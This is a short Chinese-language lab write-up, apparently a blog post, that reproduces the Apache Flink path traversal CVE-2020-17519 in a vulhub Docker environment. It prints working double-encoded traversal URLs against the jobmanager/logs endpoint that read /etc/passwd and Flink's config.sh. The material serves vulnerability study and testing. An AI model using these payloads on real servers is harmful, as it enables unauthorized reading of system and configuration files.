Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力,大数据态势感知关联分析规则经常会用到该技术。Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。[1]
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞
docker-compose build //可选docker-compose up -d完成试验后,记得删除漏洞环境哦~~
docker-compose downdocker system prune -a -f //可选简单访问一下,说明Apache Flink jobmanager/logs 路径穿越 (CVE-2020-17519)环境搭建成功了
直接体验目录穿越,任意文件读取,其中%25%2f等价于%2f,URL解码后是/
http://144.34.162.13:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd说是任意文件读取,那么读取网站代码,网站配置文件,就会有很大的风险了
http://144.34.162.13:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fopt%252fflink%252fbin%252fconfig.sh参考^Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519) https://vulhub.org/#/environments/flink/CVE-2020-17519/